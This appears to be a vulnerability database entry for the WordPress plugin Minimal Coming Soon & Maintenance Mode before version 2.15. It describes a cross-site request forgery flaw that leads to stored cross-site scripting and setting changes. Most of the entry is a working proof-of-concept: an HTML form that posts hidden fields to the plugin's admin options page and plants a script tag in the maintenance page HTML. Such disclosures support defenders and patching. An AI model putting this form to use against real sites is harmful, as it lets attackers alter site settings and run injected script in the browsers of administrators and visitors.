Minimal Coming Soon & Maintenance Mode < 2.15 - CSRF to Stored XSS and Setting Changes

2020-01-08T00:00:00
ID WPEX-ID:10007
Type wpexploit
Reporter Chloe Chamberland
Modified 2020-09-22T00:00:00

Description

WordPress Vulnerability - Minimal Coming Soon & Maintenance Mode < 2.15 - CSRF to Stored XSS and Setting Changes

                                        
                                            &lt;html&gt;
  &lt;body&gt;
    &lt;form action="URL/wp-admin/options-general.php?page=maintenance_mode_options" method="POST"&gt;
      &lt;input type="hidden" name="signals_csmm_showlogged" value="1" /&gt;
      &lt;input type="hidden" name="signals_csmm_html" value="&lt;script&gt;alert(1)&lt;/script&gt;" /&gt;
      &lt;input type="hidden" name="signals_csmm_css" value="" /&gt;
      &lt;input type="hidden" name="signals_csmm_submit" value="" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;